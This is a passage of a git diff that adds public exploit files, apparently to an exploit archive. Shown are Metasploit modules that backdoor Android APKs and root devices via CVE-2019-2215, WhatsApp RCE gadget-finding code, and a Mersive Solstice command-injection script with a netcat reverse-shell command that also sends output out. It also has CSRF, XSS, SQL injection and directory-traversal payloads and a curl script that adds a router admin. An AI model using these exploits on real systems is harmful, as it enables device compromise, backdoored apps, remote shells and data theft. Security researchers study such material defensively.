+      'SessionTypes'   => [ 'meterpreter' ],
+      'Platform'       => [ 'android' ],
+      'Arch'           => [ ARCH_DALVIK ],
+      'Targets'        => [ [ 'Automatic', {} ] ],
+      'DefaultOptions' => {
+        'PAYLOAD' => 'android/meterpreter/reverse_tcp',
+        'AndroidWakelock' => false, # the target may not have the WAKE_LOCK permission
+        'DisablePayloadHandler' => true,
+      },
+      'DefaultTarget'  => 0,
+      'Notes' => {
+        'SideEffects' => ['ARTIFACTS_ON_DISK', 'SCREEN_EFFECTS'],
+        'Stability' => ['SERVICE_RESOURCE_LOSS'], # ZTE youtube app won't start anymore
+      }
+    }))
+    register_options([
+      OptString.new('PACKAGE', [true, 'The package to target, or ALL to attempt all', 'com.phonegap.camerasample']),
+    ])
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+    ]
+  end
+
+  def check
+    os = cmd_exec("getprop ro.build.version.release")
+    unless Gem::Version.new(os).between?(Gem::Version.new('5.1.1'), Gem::Version.new('8.0.0'))
+      vprint_error "Android version #{os} is not vulnerable."
+      return CheckCode::Safe
+    end
+    vprint_good "Android version #{os} appears to be vulnerable."
+
+    patch = cmd_exec('getprop ro.build.version.security_patch')
+    if patch.empty?
+      print_status 'Unable to determine patch level.  Pre-5.0 this is unaccessible.'
+    elsif patch > '2017-12-05'
+      vprint_error "Android security patch level #{patch} is patched."
+      return CheckCode::Safe
+    else
+      vprint_good "Android security patch level #{patch} is vulnerable"
+    end
+
+    CheckCode::Appears
+  end
+
+  def exploit
+
+    def infect(apkfile)
+      unless apkfile.start_with?("package:")
+        fail_with Failure::BadConfig, 'Unable to locate app apk'
+      end
+      apkfile = apkfile[8..-1]
+      print_status "Downloading APK: #{apkfile}"
+      apk_data = read_file(apkfile)
+
+      begin
+        # Create an apk with the payload injected
+        apk_backdoor = ::Msf::Payload::Apk.new
+        apk_zip = apk_backdoor.backdoor_apk(nil, payload.encoded, false, false, apk_data, false)
+
+        # Extract the classes.dex
+        dex_data = ''
+        Zip::File.open_buffer(apk_zip) do |zipfile|
+          dex_data = zipfile.read("classes.dex")
+        end
+        dex_size = dex_data.length
+
+        # Fix the original APKs zip file code directory
+        cd_end_addr = apk_data.rindex("\x50\x4b\x05\x06")
+        cd_start_addr = apk_data[cd_end_addr+16, cd_end_addr+20].unpack("V")[0]
+        apk_data[cd_end_addr+16...cd_end_addr+20] = [ cd_start_addr+dex_size ].pack("V")
+        pos = cd_start_addr
+        while pos && pos < cd_end_addr
+          offset = apk_data[pos+42, pos+46].unpack("V")[0]
+          apk_data[pos+42...pos+46] = [ offset+dex_size ].pack("V")
+          pos = apk_data.index("\x50\x4b\x01\x02", pos+46)
+        end
+
+        # Prepend the new classes.dex to the apk
+        out_data = dex_data + apk_data
+        out_data[32...36] = [ out_data.length ].pack("V")
+        out_data = fix_dex_header(out_data)
+
+        out_apk = "/sdcard/#{Rex::Text.rand_text_alphanumeric 6}.apk"
+        print_status "Uploading APK: #{out_apk}"
+        write_file(out_apk, out_data)
+        register_file_for_cleanup(out_apk)
+        print_status "APK uploaded"
+
+        # Prompt the user to update the APK
+        session.appapi.app_install(out_apk)
+        print_status "User should now have a prompt to install an updated version of the app"
+        true
+      rescue => e
+        print_error e.to_s
+        false
+      end
+    end
+
+    unless [CheckCode::Detected, CheckCode::Appears].include? check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if datastore["PACKAGE"] == 'ALL'
+      vprint_status('Finding installed packages (this can take a few minutes depending on list of installed packages)')
+      apkfiles = []
+      all = cmd_exec("pm list packages").split("\n")
+      c = 1
+      all.each do |package|
+        package = package.split(':')[1]
+        vprint_status("Attempting exploit of apk #{c}/#{all.length} for #{package}")
+        c += 1
+        next if ['com.metasploit.stage', # avoid injecting into ourself
+                ].include? package # This was left on purpose to be expanded as need be for testing
+        result = infect(cmd_exec("pm path #{package}"))
+        break if result
+      end
+    else
+      infect(cmd_exec("pm path #{datastore["PACKAGE"]}"))
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/android/local/48129.rb b/exploits/android/local/48129.rb
new file mode 100755
index 000000000..6bcf07326
--- /dev/null
+++ b/exploits/android/local/48129.rb
@@ -0,0 +1,67 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Common
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super( update_info( info, {
+        'Name'          => "Android Binder Use-After-Free Exploit",
+        'Description'   => %q{
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+            'Jann Horn',    # discovery and exploit
+            'Maddie Stone', # discovery and exploit
+            'grant-h',      # Qu1ckR00t
+            'timwr',        # metasploit module
+        ],
+        'References'    => [
+            [ 'CVE', '2019-2215' ],
+            [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
+            [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
+            [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
+        ],
+        'DisclosureDate' => "Sep 26 2019",
+        'SessionTypes'   => [ 'meterpreter' ],
+        'Platform'       => [ "android", "linux" ],
+        'Arch'           => [ ARCH_AARCH64 ],
+        'Targets'        => [[ 'Auto', {} ]],
+        'DefaultOptions' =>
+        {
+          'PAYLOAD'      => 'linux/aarch64/meterpreter/reverse_tcp',
+          'WfsDelay'     => 5,
+        },
+        'DefaultTarget' => 0,
+      }
+    ))
+  end
+
+  def upload_and_chmodx(path, data)
+    write_file path, data
+    chmod(path)
+    register_file_for_cleanup(path)
+  end
+
+  def exploit
+    local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit" )
+    exploit_data = File.read(local_file, {:mode => 'rb'})
+
+    workingdir = session.fs.dir.getwd
+    exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
+    upload_and_chmodx(exploit_file, exploit_data)
+    payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
+    upload_and_chmodx(payload_file, generate_payload_exe)
+
+    print_status("Executing exploit '#{exploit_file}'")
+    result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
+    print_status("Exploit result:\n#{result}")
+  end
+end
\ No newline at end of file
diff --git a/exploits/android/remote/47515.cpp b/exploits/android/remote/47515.cpp
new file mode 100644
index 000000000..9ab06c349
--- /dev/null
+++ b/exploits/android/remote/47515.cpp
@@ -0,0 +1,109 @@
+# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
+# Date: 2019-10-16
+# Exploit Author: Valerio Brussani (@val_brux)
+# Vendor Homepage: https://www.whatsapp.com/
+# Version: < 2.19.244
+# Tested on: Whatsapp 2.19.216
+# CVE: CVE-2019-11932
+# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
+# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
+# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)
+
+/*
+*
+* Introduction
+* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
+* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp 
+* 
+*/
+
+#include <jni.h>
+#include <string>
+#include <dlfcn.h>
+#include <link.h>
+
+typedef uint8_t byte;
+char *gadget_p;
+void* libc,* lib;
+
+//dls iteration for rop
+int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
+{
+    int j;
+    const char *base = (const char *)info->dlpi_addr;
+    for (j = 0; j < info->dlpi_phnum; j++) {
+        const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
+        if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
+            gadget_p = (char *) base + phdr->p_vaddr;
+            return 1;
+        }
+    }
+    return 0;
+}
+
+//system address
+void* get_system_address(){
+    libc = dlopen("libc.so",RTLD_GLOBAL);
+    void* address = dlsym( libc, "system");
+    return address;
+}
+
+//rop gadget address
+void get_gadget_lib_base_address() {
+    lib = dlopen("libhwui.so",RTLD_GLOBAL);
+    dl_iterate_phdr(dl_callback, NULL);
+}
+
+//search gadget
+long search_for_gadget_offset() {
+    char *buffer;
+    long filelen;
+    char curChar;
+    long pos = 0; int curSearch = 0;
+    //reading file
+    FILE* fd = fopen("/system/lib64/libhwui.so","rb");
+    fseek(fd, 0, SEEK_END);
+    filelen = ftell(fd);
+    rewind(fd);
+    buffer = (char *)malloc((filelen+1)*sizeof(char));
+    fread(buffer, filelen, 1, fd);
+    fclose(fd);
+    //searching for bytes
+    byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
+    while(pos <= filelen){
+        curChar = buffer[pos];pos++;
+        if(curChar == g1[curSearch]){
+            curSearch++;
+            if(curSearch > 11){
+                curSearch = 0;
+                pos-=12;
+                break;
+            }
+        }
+        else{
+            curSearch = 0;
+        }
+    }
+    return pos;
+}
+
+extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
+    char buff[30];
+    //system address
+    snprintf(buff, sizeof(buff), "%p", get_system_address());
+    dlclose(libc);
+    std::string system_string = buff;
+    return env->NewStringUTF(system_string.c_str());
+}
+
+
+
+extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
+    char buff[30];
+    get_gadget_lib_base_address();
+    //gadget address
+    snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
+    dlclose(lib);
+    std::string system_string = buff;
+    return env->NewStringUTF(system_string.c_str());
+}
\ No newline at end of file
diff --git a/exploits/android/webapps/47722.py b/exploits/android/webapps/47722.py
new file mode 100755
index 000000000..76c7b0906
--- /dev/null
+++ b/exploits/android/webapps/47722.py
@@ -0,0 +1,208 @@
+# Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution
+# Google Dork: N/A
+# Date: 2016-12-23
+# Exploit Author: Alexandre Teyar
+# Vendor Homepage: https://www2.mersive.com/
+# Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk
+# Versions: 2.8.0
+# Tested On: Mersive Solstice 2.8.0
+# CVE: CVE-2017-12945
+# Description       : This will exploit an (authenticated) blind OS command injection 
+#                     vulnerability present in Solstice devices running versions
+#                     of the firmware prior to 2.8.4.
+# Notes             : To get the the command output (in piped-mode), a netcat listener 
+#                     (e.g. 'nc -lkvp <LPORT>') needs to be launched before 
+#                     running the exploit.
+#                     To get an interactive root shell use the following syntax
+#                     'python.exe .\CVE-2017-12945.py -pass <PASSWORD>
+#                     -rh <RHOST> -p "busybox nc <LHOST> <LPORT>
+#                     -e /system/bin/sh -i"'.
+
+
+#!/usr/bin/env python3
+
+import argparse
+import logging
+import requests
+import sys
+import time
+
+
+def parse_args():
+    """ Parse and validate the command line supplied by users
+    """
+    parser = argparse.ArgumentParser(
+                description="Solstice Pod Blind Command Injection"
+            )
+
+    parser.add_argument(
+        "-d",
+        "--debug",
+        dest="loglevel",
+        help="enable verbose debug mode",
+        required=False,
+        action="store_const",
+        const=logging.DEBUG,
+        default=logging.INFO
+    )
+    parser.add_argument(
+        "-lh",
+        "--lhost",
+        dest="lhost",
+        help="the listening address",
+        required=False,
+        type=str
+    )
+    parser.add_argument(
+        "-lp",
+        "--lport",
+        dest="lport",
+        help="the listening port - default 4444",
+        required=False,
+        default="4444",
+        type=str
+    )
+    parser.add_argument(
+        "-p",
+        "--payload",
+        dest="payload",
+        help="the command to execute",
+        required=True,
+        type=str
+    )
+    parser.add_argument(
+        "-pass",
+        "--password",
+        dest="password",
+        help="the target administrator password",
+        required=False,
+        default="",
+        type=str
+    )
+    parser.add_argument(
+        "-rh",
+        "--rhost",
+        dest="rhost",
+        help="the target address",
+        required=True,
+        type=str
+    )
+
+    return parser.parse_args()
+
+
+def main():
+    try:
+        args = parse_args()
+
+        lhost = args.lhost
+        lport = args.lport
+        password = args.password
+        rhost = args.rhost
+
+        logging.basicConfig(
+            datefmt="%H:%M:%S",
+            format="%(asctime)s: %(levelname)-8s %(message)s",
+            handlers=[logging.StreamHandler()],
+            level=args.loglevel
+        )
+
+        # Redirect stdout and stderr to <FILE>
+        # only when the exploit is launched in piped mode
+        if lhost and lport:
+            payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1"
+            logging.info(
+                "attacker listening address: {}:{}".format(lhost, lport)
+            )
+        else:
+            payload = args.payload
+
+        logging.info("solstice pod address: {}".format(rhost))
+
+        if password:
+            logging.info(
+                "solstice pod administrator password: {}".format(password)
+            )
+
+        # Send the payload to be executed
+        logging.info("sending the payload...")
+        send_payload(rhost, password, payload)
+
+        # Send the results of the payload execution to the attacker
+        # using 'nc <LHOST> <LPORT> < <FILE>' then remove <FILE>
+        if lhost and lport:
+            payload = (
+                "busybox nc {} {} < /data/local/tmp/rce.tmp ".format(
+                    lhost, lport
+                )
+            )
+
+            logging.info("retrieving the results...")
+            send_payload(rhost, password, payload)
+
+            # Erase exploitation traces
+            payload = "rm -f /data/local/tmp/rce.tmp"
+
+            logging.info("erasing exploitation traces...")
+            send_payload(rhost, password, payload)
+
+    except KeyboardInterrupt:
+        logging.warning("'CTRL+C' pressed, exiting...")
+        sys.exit(0)
+
+
+def send_payload(rhost, password, payload):
+    URL = "http://{}/Config/service/saveData".format(rhost)
+
+    headers = {
+        "Content-Type": "application/json",
+        "X-Requested-With": "XMLHttpRequest",
+        "Referer": "http://{}/Config/config.html".format(rhost)
+    }
+
+    data = {
+        "m_networkCuration":
+        {
+            "ethernet":
+            {
+                "dhcp": False,
+                "staticIP": "; {}".format(payload),
+                "gateway": "",
+                "prefixLength": 24,
+                "dns1": "",
+                "dns2": ""
+            }
+        },
+        "password": "{}".format(password)
+    }
+
+    # Debugging using the BurpSuite
+    # proxies = {
+    #     'http': 'http://127.0.0.1:8080',
+    #     'https': 'https://127.0.0.1:8080'
+    # }
+
+    try:
+        logging.info("{}".format(payload))
+
+        response = requests.post(
+            URL,
+            headers=headers,
+            # proxies=proxies,
+            json=data
+        )
+
+        logging.debug(
+            "{}".format(response.json())
+        )
+
+        # Wait for the command to be executed
+        time.sleep(2)
+
+    except requests.exceptions.RequestException as ex:
+        logging.error("{}".format(ex))
+        sys.exit(0)
+
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/ashx/webapps/46765.txt b/exploits/ashx/webapps/46765.txt
new file mode 100644
index 000000000..f5b41caec
--- /dev/null
+++ b/exploits/ashx/webapps/46765.txt
@@ -0,0 +1,183 @@
+# Exploit Title: Veeam ONE Reporter - Cross-Site Request Forgery (All Actions/Methods)
+# Exploit Author: Seyed Sadegh Khatami
+# Website: https://www.cert.ir
+# Date: 2019-04-27
+# Google Dork: N/A
+# Vendor Homepage: https://www.veeam.com/
+# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
+# Version: 9.5.0.3201
+# Tested on: Windows Server 2016
+
+
+#exploit:
+<form id='del' method='POST' action='https://[target_URL]:1239/CommonDataHandlerReadOnly.ashx'>
+  <input name='f'  id='dd'>
+</form>
+
+<script>
+document.getElementById("dd").value= JSON.stringify({
+            id: '1',
+            method: 'deleteDashboard',
+            params:{ 'id' : 21}
+          });
+	  
+ document.getElementById("del").submit(); 
+</script>
+
+
+##########################################
+#all methods is vulnerable
+##########################################
+#addDashboard(p)
+#addDashboardUser(par)
+#addDashboardUserList(par)
+#applySchedulingForDashboard(dashboardId, taskId, config)
+#applySchedulingForFolder(folderId, taskId, config)
+#applySchedulingForReport(reportId, taskId, vmr, config)
+#canModifyDashboard(id)
+#captureContainer(data, taskId)
+#changeObjectVisibility(objectId, visible)
+#checkForUpdateReportPack(confirm)
+#checkIfAdmin()
+#checkUserPermissionsResolved(o)
+#checkWinVersion()
+#clearContainer()
+#connectToSqlServer(data, save)
+#DBExecuteProcedure(db)
+#DBStoreLoad(db)
+#DBStoreSave(db)
+#deleteDashboard(id)
+#deleteDashboardImage(imageId)
+#deleteDashboardWidget(p)
+#DeleteFolder(param)
+#deleteReportPack(name, id, type)
+#deleteTask(id)
+#doLogin(domain, login, password)
+#editDashboard(p)
+#emptyDashboardRecycleBin(o)
+#findDashboardUsers(p)
+#getAboutData()
+#getActionParameters()
+#getAdvancedData()
+#getAlarms()
+#getAllSchedulingsForDashboard(info)
+#getAllSchedulingsForFolder(info)
+#getAllSchedulingsForReport(info)
+#getBackUpTree(wsj)
+#getBusinessViewTree(wsj)
+#getComboData()
+#getCommonGridItem()
+#getConfiguration()
+#getConfigurationOverview(id)
+#getConnectedServersGridItem()
+#getDashboardData(dashboard_id)
+#getDashboardImages(p)
+#getDashboardPermissions(p)
+#getDashboardPredefiniedReports(p)
+#getDashboards(p)
+#getDashboardSSRSChartTypes(p)
+#getDashboardUserList(p)
+#getDashboardWidgetTypeData(p)
+#getDefaultUserName()
+#getDeletedDashboards(p)
+#getEnumeratingTaskContainers(id)
+#getEnumeratingTaskProperties(id)
+#getEnumeratingTaskScheduling(id)
+#getExtensionModules(p)
+#getIgnoredDatastores(p)
+#getIgnoredDatastoresDetails(p)
+#getInfrastructureTree(wsj)
+#getIsReporterFreeVersion()
+#getJobData(id)
+#getLicenseData()
+#getLicensedHVSockets(p)
+#getLicensedVMSockets(p)
+#getMetadata(query, reload)
+#getNeedToDisableTabs()
+#getNotificationData()
+#getObjectsToHide(p)
+#getOptionList()
+#getReportFilters(param)
+#getReportImageName()
+#getReportListTreeCheckbox(wsj)
+#getReportListTreeDashboard(wsj)
+#getReportListTreeWorkspace(wsj)
+#getReportManagementTree(wsj)
+#getReportsSectionsTree(wsj)
+#getReportStatistics(param)
+#getScheduleDashboardConfig(dashboardId, taskId)
+#getScheduleFolderConfig(folderId, taskId)
+#getScheduleReportConfig(reportId, taskId, packType)
+#getScriptArgumentList()
+#getServerScopeAll(wsj)
+#getSessionDetails(idwithtype)
+#getSessions(p)
+#getSessionsTaskTypes(p)
+#getSiteStatusGridItem()
+#getSmtpServerData()
+#getSqlServerData()
+#getSsrsServerData()
+#getSSRSStatus()
+#getStartStopDeleteButtonsEnabled(id)
+#getStatistics()
+#getTaskList(p)
+#getUpdateSessionInfo(o)
+#getvCloudList(p)
+#getVideoReportData(interval, intervalPeriod, scope)
+#getVmStatus()
+#getWidgetCustomChartConstructorData(p)
+#getWidgetData(r)
+#getWidgetList(item)
+#getWidgetPackList(j)
+#getWidgetParams(uid)
+#getWorkspace()
+#getWorkspaceReportGridItems(param)
+#isSmtpConfigured()
+#publishDashboard(id, publish)
+#recalculateProjects(ids)
+#removeDashboardUser(par)
+#resetReportImageName()
+#resetSchedulingForDashboard(dashboardId, taskId)
+#resetSchedulingForDashboardArray(dashboardId, taskId)
+#resetSchedulingForFolder(folderId)
+#resetSchedulingForReport(reportId, vmr)
+#resetSchedulingTaskForFolder(folderId, taskId)
+#resetSchedulingTaskForReport(reportId, taskId, vmr)
+#resetSchedulingTasksForFolderArray(folderId, taskId)
+#resetSchedulingTasksForReportArray(reportId, taskId, vmr)
+#restoreDashboard(p)
+#revokeHost(hostName)
+#revokeHostHV(hostName)
+#SaveFolder(param)
+#saveIgnoredDatastores(taskContainerId, dataStores)
+#saveSchedulingInfo(taskId, taskProp)
+#saveTask(taskProp, taskContainers, excludes)
+#sendNotificationAboutDashboardSharing(to, subject, dashboardName, dashboardUrl, permissionLevel)
+#sendTestMessage(data, setting)
+#setAdvancedData(measure)
+#setComboData(data)
+#setDashboardUserPermissions(par)
+#setDashboardWidget(p)
+#SetDragAndDropPosition(dwid, colIndex, position, height)
+#setSchedulingEnability(dashboardId, taskId, disabled)
+#setSchedulingEnabilityArray(dashboardId, taskId, disabled)
+#setSchedulingEnabilityForFolder(folderId, taskId, disabled)
+#setSchedulingEnabilityForFolderArray(folderId, taskId, disabled)
+#setSchedulingEnabilityForReport(reportId, taskId, disabled)
+#setSchedulingEnabilityForReportArray(reportId, taskId, disabled)
+#setSmtpServerData(data)
+#setSsrsServerData(data)
+#startTask(id)
+#stopTask(id)
+#system.about()
+#    Returns a summary about the server implementation for display purposes.
+#system.listMethods()
+#    Returns an array of method names implemented by this service.
+#system.version()
+#    Returns the version server implementation using the major, minor, build and revision format.
+#testServer(tcd)
+#testSsrsConnection(data)
+#updateDashboardPosition(p)
+#updateTreeExpandedStates(wsj, a)
+#validateTaskName(tcd, id)
+##########################################
\ No newline at end of file
diff --git a/exploits/ashx/webapps/46766.txt b/exploits/ashx/webapps/46766.txt
new file mode 100644
index 000000000..13e79ac54
--- /dev/null
+++ b/exploits/ashx/webapps/46766.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Stored XSS)
+# Exploit Author: Seyed Sadegh Khatami
+# Website: https://www.cert.ir
+# Date: 2019-04-27
+# Google Dork: N/A
+# Vendor Homepage: https://www.veeam.com/
+# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
+# Version: 9.5.0.3201
+# Tested on: Windows Server 2016
+
+
+#exploit:
+
+Path: /CommonDataHandlerReadOnly.ashx 
+
+method: addDashboard / editDashboard
+
+SET Description(config) field to “AAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”
\ No newline at end of file
diff --git a/exploits/ashx/webapps/46767.txt b/exploits/ashx/webapps/46767.txt
new file mode 100644
index 000000000..a5b0c6223
--- /dev/null
+++ b/exploits/ashx/webapps/46767.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Add/Edit Widget)
+# Exploit Author: Seyed Sadegh Khatami
+# Website: https://www.cert.ir
+# Date: 2019-04-27
+# Google Dork: N/A
+# Vendor Homepage: https://www.veeam.com/
+# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
+# Version: 9.5.0.3201
+# Tested on: Windows Server 2016
+
+
+#exploit:
+
+Path: /CommonDataHandlerReadOnly.ashx 
+
+method: setDashboardWidget
+
+SET Caption field to “AAAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”
\ No newline at end of file
diff --git a/exploits/asp/webapps/46799.txt b/exploits/asp/webapps/46799.txt
new file mode 100644
index 000000000..efa4deff1
--- /dev/null
+++ b/exploits/asp/webapps/46799.txt
@@ -0,0 +1,28 @@
+[+] Sql Injection on microASP (Portal+) CMS
+
+[+] Date: 05/05/2019
+
+[+] Risk: High
+
+[+] CWE Number : CWE-89
+
+[+] Author: Felipe Andrian Peixoto
+
+[+] Vendor Homepage: http://www.microasp.it/
+
+[+] Contact: felipe_andrian@hotmail.com
+
+[+] Tested on: Windows 7 and Gnu/Linux
+
+[+] Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;)
+
+[+] Exploit : 
+
+        http://host/patch/pagina.phtml?explode_tree= [SQL Injection]
+
+[+] PoC : 
+ 
+   https://server/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+-
+   https://server/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
+   
+[+] EOF
\ No newline at end of file
diff --git a/exploits/asp/webapps/47284.txt b/exploits/asp/webapps/47284.txt
new file mode 100644
index 000000000..de940b07c
--- /dev/null
+++ b/exploits/asp/webapps/47284.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
+# Date: 2019-09-16
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
+# Version: 12.01
+# Tested on Windows
+
+# Vulnerable parameter: PF (member_profile.asp)
+# GET Request
+
+GET /member_profile.asp?PF=10' HTTP/1.1
+Host: host
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
+Connection: close
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/exploits/asp/webapps/47666.txt b/exploits/asp/webapps/47666.txt
new file mode 100644
index 000000000..8eeca7b5f
--- /dev/null
+++ b/exploits/asp/webapps/47666.txt
@@ -0,0 +1,27 @@
+# Title: Crystal Live HTTP Server 6.01 - Directory Traversal
+# Date of found: 2019-11-17
+# Author: Numan Türle
+# Vendor Homepage: https://www.genivia.com/
+# Version : Crystal Quality 6.01.x.x
+# Software Link : https://www.crystalrs.com/crystal-quality-introduction/
+
+
+POC
+---------
+GET /../../../../../../../../../../../../windows/win.iniHTTP/1.1
+Host: 12.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+
+Response
+---------
+
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
\ No newline at end of file
diff --git a/exploits/asp/webapps/47789.txt b/exploits/asp/webapps/47789.txt
new file mode 100644
index 000000000..e828986d9
--- /dev/null
+++ b/exploits/asp/webapps/47789.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
+# Google Dork: site:*.*.com "Web File Manager" inurl:?login=
+# Shodan Dork: Server: Rumpus
+# Date: 2019-12-14
+# Exploit Author: Harshit Shukla, Sudeepto Roy
+# Vendor Homepage: https://www.maxum.com/
+# Tested On: Windows & Mac
+# Version: 8.2.9.1
+# CVE: CVE-2019-19368
+
+Description: 
+A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager.
+
+PoC:
+
+Payload: ?!'><sVg/OnLoAD=alert`1`//
+
+Vulnerable URL:
+http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`//
+
+Solution:
+Update to the latest version released by vendor.
\ No newline at end of file
diff --git a/exploits/asp/webapps/47960.txt b/exploits/asp/webapps/47960.txt
new file mode 100644
index 000000000..c4030c342
--- /dev/null
+++ b/exploits/asp/webapps/47960.txt
@@ -0,0 +1,27 @@
+# Exploit Title: OLK Web Store 2020 - Cross-Site Request Forgery
+# Google Dork: intext:"TopManage ® 2002 - 2020"
+# Date: 2020-01-13
+# Exploit Author: Joel Aviad Ossi
+# Vendor Homepage: http://www.topmanage.com/
+# Software Link: http://www.topmanage.com/microsites/olk-web-store/
+# Version: 2020
+# Tested on: N/A
+# CVE : N/A
+
+# Reference: https://websec.nl/news.php 
+
+POST /olk/client/login.asp HTTP/1.1
+Host: examplesite.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 88
+Origin: https://examplesite.com
+Connection: close
+Referer: https://examplesite.com/olk/client/login.asp?se=Y
+Cookie: myLng=en; ASPSESSIONIDCGARQSCD=JGFFLBIAAKGBKANKLAPHMEDH
+Upgrade-Insecure-Requests: 1
+
+dbID=0&UserName=%22%3EPOC&Password=%22%3ECSRF&newLng=en&btnEnter=Enter&sHeight=400&other=
\ No newline at end of file
diff --git a/exploits/asp/webapps/48217.txt b/exploits/asp/webapps/48217.txt
new file mode 100644
index 000000000..9a14a07dd
--- /dev/null
+++ b/exploits/asp/webapps/48217.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)
+# Date: 2020-03-05
+# Exploit Author: Miguel Mendez Z.
+# Vendor Homepage: www.sumavision.com
+# Software Link: http://www.sumavision.com/ensite/i.php?id=29
+# Version: EMR 3.0.4.27
+# CVE : CVE-2020-10181
+
+-----------------------Exploit Bash---------------------------
+echo ""
+read -p "Set Hostname: " host
+read -p "Set username: " user
+echo "(The password should be between 6 and 32 in length)"
+read -p "Set password: " pass
+echo
+echo "[+] creating user..."
+sleep 2
+postdata=$(curl -X POST -d "type=11&cmd=3&language=0&slotNo=255&setString=$user<*1*>administrator<*1*>$pass" "http://$host/goform/formEMR30" -s | grep -i "0")
+if echo "$postdata" | grep -q "0</html>"; then
+echo "[+] http://$host/frame_en.asp"
+echo "[+] created access($user - $pass)"
+else
+echo "[-] user not created"
+fi
+------------------------------------------------------
+
+Reference:
+https://github.com/s1kr10s/Sumavision_EMR3.0/blob/master/exploit_sumavision.sh
\ No newline at end of file
diff --git a/exploits/aspx/webapps/46987.txt b/exploits/aspx/webapps/46987.txt
new file mode 100644
index 000000000..4fba337ad
--- /dev/null
+++ b/exploits/aspx/webapps/46987.txt
